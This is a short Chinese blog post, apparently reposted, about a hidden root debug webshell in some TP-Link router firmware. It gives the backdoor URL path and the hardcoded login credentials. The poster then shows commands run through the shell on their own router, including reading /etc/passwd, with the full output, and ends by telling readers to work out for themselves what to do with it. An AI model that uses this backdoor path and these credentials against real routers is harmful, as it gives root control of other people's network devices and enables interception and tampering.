TP-LINK路由器webshell后门

来源：Z的Blog

TP-Link WDR740ND/WDR740N 路由器有一个隐藏的调试功能的shell，可以root权限，可能会被攻击者滥用。

固件版本：3.12.11 Build 111130 Rel.55312n and possibly others

exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html

User: osteam Password: 5up

使用这个shell 攻击者可能会添加恶意的路由规则或更改配置文件。

==============以上是废话==============

过客的路由器是：TP-Link TL-WR941N

软件版本：3.11.7 Build 100723 Rel.46142n

硬件版本：WR941N v4/v5 00000000

开始测试

cat /proc/cpuinfo&

827

# system type : Atheros AR7240 (Python)

processor : 0

cpu model : MIPS 24K V7.4

BogoMIPS : 265.21

wait instruction : yes

microsecond timers : yes

tlb_entries : 16

extra interrupt vector : yes

hardware watchpoint : yes

ASEs implemented : mips16

VCED exceptions : not available

VCEI exceptions : not available

cat /etc/passwd&

828

# root:x:0:0:root:/root:/bin/sh

Admin:x:0:0:root:/root:/bin/sh

bin:x:1:1:bin:/bin:/bin/sh

daemon:x:2:2:daemon:/usr/sbin:/bin/sh

adm:x:3:4:adm:/adm:/bin/sh

lp:x:4:7:lp:/var/spool/lpd:/bin/sh

sync:x:5:0:sync:/bin:/bin/sync

shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh

operator:x:11:0:Operator:/var:/bin/sh

nobody:x:65534:65534:nobody:/home:/bin/sh

ap71:x:500:0:Linux User,,,:/root:/bin/sh

cat /proc/meminfo&

843

# MemTotal: 30676 kB

MemFree: 12876 kB

Buffers: 1836 kB

Cached: 6056 kB

SwapCached: 0 kB

Active: 6116 kB

Inactive: 3892 kB

HighTotal: 0 kB

HighFree: 0 kB

LowTotal: 30676 kB

LowFree: 12876 kB

SwapTotal: 0 kB

SwapFree: 0 kB

Dirty: 0 kB

Writeback: 0 kB

Mapped: 4276 kB

Slab: 5436 kB

CommitLimit: 15336 kB

Committed_AS: 4324 kB

PageTables: 276 kB

VmallocTotal: 1048560 kB

VmallocUsed: 1944 kB

VmallocChunk: 1046464 kB

# ls /

bin etc linuxrc proc sbin usr web

dev lib mnt root tmp var

#

复制代码至于利用这个东西能干啥……那就自己发挥吧，走了。